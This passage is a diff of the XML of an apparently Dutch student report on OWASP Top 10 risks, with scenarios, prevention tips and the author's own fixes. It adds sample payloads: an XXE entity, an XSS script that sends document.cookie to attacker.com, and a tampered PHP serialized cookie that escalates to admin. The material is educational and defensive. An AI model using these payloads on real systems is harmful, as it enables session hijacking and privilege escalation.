-          <mc:Fallback xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex">
+          <mc:Fallback>
             <w:pict>
               <v:shape w14:anchorId="720216C7" id="_x0000_s1032" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:36.85pt;margin-top:115.65pt;width:416.65pt;height:22.1pt;z-index:251667456;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
+                      <w:pPr>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:proofErr w:type="gramStart"/>
                       <w:r>
-                        <w:t xml:space="preserve">&lt;!ENTITY </w:t>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t>&lt;!ENTITY</w:t>
+                      </w:r>
+                      <w:proofErr w:type="gramEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> </w:t>
                       </w:r>
                       <w:proofErr w:type="spellStart"/>
                       <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
                         <w:t>xxe</w:t>
                       </w:r>
                       <w:proofErr w:type="spellEnd"/>
                       <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
                         <w:t xml:space="preserve"> SYSTEM "https://192.168.1.1/private" &gt;]&gt;</w:t>
                       </w:r>
                     </w:p>
@@ -4451,7 +5651,7 @@
               </wp:anchor>
             </w:drawing>
           </mc:Choice>
-          <mc:Fallback xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex">
+          <mc:Fallback>
             <w:pict>
               <v:shape w14:anchorId="0A34C449" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:363.2pt;margin-top:64.45pt;width:414.4pt;height:22.1pt;z-index:251669504;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
@@ -4499,11 +5699,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc40955744"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc42011044"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4564,6 +5764,16 @@
       <w:r>
         <w:t>Controleer of de functionaliteit voor het uploaden van XML- of XSL-bestanden inkomende XML valideert met XSD-validatie of vergelijkbaar.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="17" w:name="_Toc42011045"/>
+      <w:r>
+        <w:t>Hoe heb ik dit opgelost?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:p>
       <w:r>
@@ -4591,44 +5801,27 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc40955745"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc42011046"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Broken Access Control</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="14"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc40955746"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
+      <w:bookmarkEnd w:id="18"/>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t>Beperkingen op wat geauthenticeerde gebruikers mogen doen, worden vaak niet correct gehandhaafd. Aanvallers kunnen deze gebreken misbruiken om toegang te krijgen tot ongeoorloofde functionaliteit en/ of gegevens, zoals toegang krijgen tot de accounts van andere gebruikers, gevoelige bestanden bekijken, de gegevens van andere gebruikers wijzigen, toegangsrechten wijzigen, enz.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc40955747"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc42011047"/>
       <w:r>
         <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4793,7 +5986,7 @@
               </wp:anchor>
             </w:drawing>
           </mc:Choice>
-          <mc:Fallback xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex">
+          <mc:Fallback>
             <w:pict>
               <v:shape w14:anchorId="20AF7389" id="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:34pt;margin-top:38pt;width:437.05pt;height:46.4pt;z-index:251671552;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
@@ -4813,12 +6006,18 @@
                         <w:t>pstmt.setString</w:t>
                       </w:r>
                       <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t>(</w:t>
+                      </w:r>
                       <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">(1, </w:t>
+                        <w:t xml:space="preserve">1, </w:t>
                       </w:r>
                       <w:proofErr w:type="spellStart"/>
                       <w:r>
@@ -4864,12 +6063,18 @@
                         <w:t>pstmt.executeQuery</w:t>
                       </w:r>
                       <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t>(</w:t>
+                      </w:r>
                       <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
-                        <w:t>( );</w:t>
+                        <w:t xml:space="preserve"> );</w:t>
                       </w:r>
                     </w:p>
                     <w:p/>
@@ -4957,11 +6162,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc40955748"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc42011048"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5024,6 +6229,16 @@
       <w:r>
         <w:t>Modeltoegangscontroles moeten het eigendom van records afdwingen, in plaats van te accepteren dat de gebruiker elk record kan maken, lezen, bijwerken of verwijderen.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc42011049"/>
+      <w:r>
+        <w:t>Hoe heb ik dit opgelost?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:r>
@@ -5050,12 +6265,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc40955749"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc42011050"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Security Misconfiguration</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="18"/>
+      <w:bookmarkEnd w:id="22"/>
     </w:p>
     <w:p>
       <w:r>
@@ -5066,11 +6281,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc40955750"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc42011051"/>
       <w:r>
         <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="23"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5124,11 +6339,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc40955751"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc42011052"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="24"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5177,6 +6392,16 @@
       <w:r>
         <w:t>Een geautomatiseerd proces om de effectiviteit van de configuraties en instellingen in alle omgevingen te verifiëren.</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Toc42011053"/>
+      <w:r>
+        <w:t>Hoe heb ik dit opgelost?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="25"/>
     </w:p>
     <w:p>
       <w:r>
@@ -5207,12 +6432,12 @@
           <w:tab w:val="left" w:pos="3780"/>
         </w:tabs>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc40955752"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc42011054"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Cross-Site Scripting XSS</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="26"/>
       <w:r>
         <w:tab/>
       </w:r>
@@ -5224,13 +6449,184 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="27" w:name="_Toc42011055"/>
+      <w:r>
+        <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="27"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>De applicatie gebruikt niet-vertrouwde gegevens bij de constructie van het volgende HTML-fragment zonder validatie of ontsnapping:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1416"/>
+      </w:pPr>
+      <w:r>
+        <w:t>(String) pagina + = "&lt;input name = 'creditcard' type = 'TEXT'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1416"/>
+      </w:pPr>
+      <w:r>
+        <w:t>value = '"+ request.getParameter (" CC ") +"'&gt; ";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>De aanvaller past de parameter ‘CC’ in de browser aan om:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1416"/>
+      </w:pPr>
+      <w:r>
+        <w:t>'&gt; &lt;script&gt; document.location =</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1416"/>
+      </w:pPr>
+      <w:r>
+        <w:t>'http://www.attacker.com/cgi-bin/cookie.cgi?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1416"/>
+      </w:pPr>
+      <w:r>
+        <w:t>foo = '+ document.cookie &lt;/script&gt;'.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Door deze aanval wordt de sessie-ID van het slachtoffer naar de website van de aanvaller gestuurd, zodat de aanvaller de huidige sessie van de gebruiker kan kapen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="28" w:name="_Toc42011056"/>
+      <w:r>
+        <w:t>Hoe kun je deze hacks voorkomen?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="28"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Met frameworks die XSS automatisch per ontwerp </w:t>
+      </w:r>
+      <w:r>
+        <w:t>escapen</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, zoals de nieuwste Ruby on Rails, React JS. Leer de beperkingen van de XSS-bescherming van elk </w:t>
+      </w:r>
+      <w:r>
+        <w:t>framework</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> en ga op de juiste manier om met de use cases die niet worden behandeld.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>het wegnemen van niet-vertrouwde HTTP-verzoekgegevens op basis van de context in de HTML-uitvoer (body, attribuut, JavaScript, CSS of URL) lost gereflecteerde en opgeslagen XSS-kwetsbaarheden op. De OWASP Cheat Sheet ‘XSS Prevention’ bevat details over de vereiste technieken voor het ontsnappen van gegevens.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Het inschakelen van een Content Security Policy (CSP) als een diepgaande, verzachtende controle tegen XSS. Het is effectief als er geen andere kwetsbaarheden zijn die het plaatsen van kwaadaardige code via lokale bestandsopnames mogelijk zouden maken (bijv. Overschrijven van paden of kwetsbare bibliotheken van toegestane netwerken voor inhoudslevering).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="29" w:name="_Toc42011057"/>
+      <w:r>
+        <w:t>Hoe heb ik dit opgelost?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="29"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Springboot maakt gebruik van een content syciryt policy om aanvallen doormiddel van xss te voorkomen dit process wordt volledig afgevangen en is te configuren naar wens.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc40955753"/>
-      <w:r>
+      <w:bookmarkStart w:id="30" w:name="_Toc42011058"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Insecure Deserialization</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="22"/>
+      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
       <w:r>
@@ -5239,13 +6635,190 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="31" w:name="_Toc42011059"/>
+      <w:r>
+        <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="31"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Een React-toepassing roept een set Spring Boot-microservices aan. Als functionele programmeurs probeerden ze ervoor te zorgen dat hun code onveranderlijk is. De oplossing die ze bedachten, is de gebruikersstatus serialiseren en deze bij elk verzoek heen en weer doorgeven. Een aanvaller ziet de "R00" -handtekening van het Java-object en gebruikt de Java Serial Killer-tool om externe code op de applicatieserver uit te voeren.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Een PHP-forum gebruikt PHP-serialisering van objecten om een ​​"super" -cookie op te slaan, die de gebruikers-ID, rol, wachtwoordhash en andere status van de gebruiker bevat:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:firstLine="696"/>
+      </w:pPr>
+      <w:r>
+        <w:t>a: 4: {i: 0; i: 132; i: 1; s: 7: "Mallory"; i: 2; s: 4: "user";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:firstLine="696"/>
+      </w:pPr>
+      <w:r>
+        <w:t>i: 3; s: 32: "b6a8b3bea87fe0e05022f8f3c88bc960";}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Een aanvaller verandert het geserialiseerde object om zichzelf beheerdersrechten te geven:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:firstLine="696"/>
+      </w:pPr>
+      <w:r>
+        <w:t>a: 4: {i: 0; i: 1; i: 1; s: 5: "Alice"; i: 2; s: 5: "admin";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:firstLine="696"/>
+      </w:pPr>
+      <w:r>
+        <w:t>i: 3; s: 32: "b6a8b3bea87fe0e05022f8f3c88bc960";}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="32" w:name="_Toc42011060"/>
+      <w:r>
+        <w:t>Hoe kun je deze hacks voorkomen?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="32"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Integriteitscontroles implementeren, zoals digitale handtekeningen op alle geserialiseerde objecten om te voorkomen dat er vijandige objecten worden gemaakt of dat er met gegevens wordt geknoeid.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Het afdwingen van strikte typebeperkingen tijdens deserialisatie vóór het maken van een object, aangezien de code doorgaans een definieerbare set klassen verwacht. Er zijn omleidingen voor deze techniek aangetoond, dus het is niet aan te raden hier uitsluitend op te vertrouwen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Het isoleren en uitvoeren van code die indien mogelijk deserialiseert in omgevingen met lage bevoegdheden.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Log deserialisatie-uitzonderingen en -fouten, zoals wanneer het inkomende type niet het verwachte type is, of deserialisatie genereert uitzonderingen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="14"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Inkomende en uitgaande netwerkconnectiviteit beperken of bewaken vanaf containers of servers die deserialiseren.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="33" w:name="_Toc42011061"/>
+      <w:r>
+        <w:t>Hoe heb ik dit opgelost?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="33"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc40955754"/>
-      <w:r>
+      <w:bookmarkStart w:id="34" w:name="_Toc42011062"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Using Components with Known Vulnerabilities</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="23"/>
+      <w:bookmarkEnd w:id="34"/>
     </w:p>
     <w:p>
       <w:r>
@@ -5254,21 +6827,245 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="35" w:name="_Toc42011063"/>
+      <w:r>
+        <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="35"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="17"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Componenten worden doorgaans uitgevoerd met dezelfde rechten als de applicatie zelf, dus gebreken in elk onderdeel kunnen ernstige gevolgen hebben. Dergelijke fouten kunnen per ongeluk (bijv. Codeerfout) of opzettelijk (bijv.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Achterdeur in component) zijn.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="36" w:name="_Toc42011064"/>
+      <w:r>
+        <w:t>Hoe kun je deze hacks voorkomen?</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="36"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="17"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Verwijder ongebruikte afhankelijkheden, onnodige functies, componenten, bestanden en documentatie.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="17"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Haal alleen componenten uit officiële bronnen via beveiligde links. Geef de voorkeur aan ondertekende pakketten om de kans te verkleinen dat een gewijzigd, kwaadaardig onderdeel wordt opgenomen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
